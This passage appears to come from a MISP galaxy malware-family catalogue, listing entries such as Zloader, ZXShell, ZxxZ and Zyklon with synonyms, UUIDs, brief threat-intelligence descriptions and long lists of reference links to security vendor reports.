Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zloader.
Known Synonyms |
---|
DELoader |
SILENTNIGHT |
Terdot |
Internal MISP references
UUID 13236f94-802b-4abc-aaa9-cb80cf4df9ed
which can be used as unique global reference for Zloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/ - webarchive
- https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/ - webarchive
- https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/ - webarchive
- https://twitter.com/ffforward/status/1324281530026524672 - webarchive
- https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/ - webarchive
- https://www.zscaler.com/blogs/security-research/zloader-learns-old-tricks - webarchive
- https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/ - webarchive
- https://labs.k7computing.com/?p=22458 - webarchive
- https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain - webarchive
- https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/ - webarchive
- https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://blog.vincss.net/re026-a-deep-dive-into-zloader-the-silent-night/ - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance - webarchive
- https://unit42.paloaltonetworks.com/api-hammering-malware-families/ - webarchive
- https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks - webarchive
- https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/ - webarchive
- https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1 - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://johannesbader.ch/blog/the-dga-of-zloader/ - webarchive
- https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/ - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt - webarchive
- https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed - webarchive
- https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html - webarchive
- https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware - webarchive
- https://noticeofpleadings.com/zloader/ - webarchive
- https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/ - webarchive
- https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489 - webarchive
- https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex - webarchive
- https://labs.k7computing.com/index.php/zloader-strikes-back/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://www.youtube.com/watch?v=QBoj6GB79wM - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf - webarchive
- https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://blogs.quickheal.com/zloader-entailing-different-office-files/ - webarchive
- https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/ - webarchive
- https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/ - webarchive
- https://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850 - webarchive
- https://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-night - webarchive
- https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/ - webarchive
- https://www.youtube.com/watch?v=mhX-UoaYnOM - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns - webarchive
- https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ - webarchive
- https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/ - webarchive
- https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/ - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight - webarchive
- https://decoded.avast.io/threatresearch/avast-q2-2022-threat-report/ - webarchive
- https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader - webarchive
- https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/ - webarchive
- https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries - webarchive
- https://www.lac.co.jp/lacwatch/people/20201106_002321.html - webarchive
- https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/ - webarchive
- https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/ - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ - webarchive
- https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html - webarchive
- https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/ - webarchive
- https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/ - webarchive
- https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html - webarchive
- https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf - webarchive
- https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ - webarchive
- https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/ - webarchive
- https://blog.alyac.co.kr/3322 - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/ - webarchive
- https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/ - webarchive
- https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems - webarchive
- https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/ - webarchive
- https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/ - webarchive
- https://twitter.com/VK_Intel/status/1294320579311435776 - webarchive
- https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zlob
Internal MISP references
UUID ddccba7e-89f3-4b51-803c-e473ca5623da
which can be used as unique global reference for Zlob
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZStealer
Information Stealer used by Void Balaur.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZStealer.
Known Synonyms |
---|
Z*Stealer |
Internal MISP references
UUID 750c4f21-36b0-45b7-80d5-e6c9fdf5134d
which can be used as unique global reference for ZStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zumanek
According to ESET, this malware family was active exclusively in Brazil until the middle of 2020. It is identified by its method for obfuscating strings: it creates a function for each character of the alphabet and then concatenates the results of calling the correct functions in sequence.
Internal MISP references
UUID 2fde6fa9-6e3f-491f-95f7-107b41efacd8
which can be used as unique global reference for Zumanek
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZUpdater
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZUpdater.
Known Synonyms |
---|
Zpevdo |
Internal MISP references
UUID 36a54d23-39ea-446c-b690-6a899890773d
which can be used as unique global reference for ZUpdater
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zupdax
Internal MISP references
UUID 0a0b04d4-afc7-4135-b71e-1148f965b566
which can be used as unique global reference for Zupdax
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdax - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ - webarchive
- https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZXShell
According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZXShell.
Known Synonyms |
---|
Sensocode |
Internal MISP references
UUID 23920e3b-246a-4172-bf9b-5e9f90510a15
which can be used as unique global reference for ZXShell
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell - webarchive
- https://risky.biz/whatiswinnti/ - webarchive
- https://content.fireeye.com/apt-41/rpt-apt41 - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://blogs.cisco.com/security/talos/opening-zxshell - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor - webarchive
- https://lab52.io/blog/apt27-rootkit-updates/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/iron-taurus/ - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf - webarchive
- https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw - webarchive
- https://github.com/smb01/zxshell - webarchive
- https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
- https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZxxZ
Cisco Talos attributes this backdoor with moderate confidence to the Bitter APT.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZxxZ.
Known Synonyms |
---|
MuuyDownloader |
Internal MISP references
UUID 3782b76b-3fe8-41d9-b258-dac25f9699a2
which can be used as unique global reference for ZxxZ
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zyklon
According to FireEye, Zyklon or Zyklon HTTP is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.
Internal MISP references
UUID 721e9af0-8a60-4b9e-9137-c23e86d75722
which can be used as unique global reference for Zyklon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon - webarchive
- https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html - webarchive
- https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |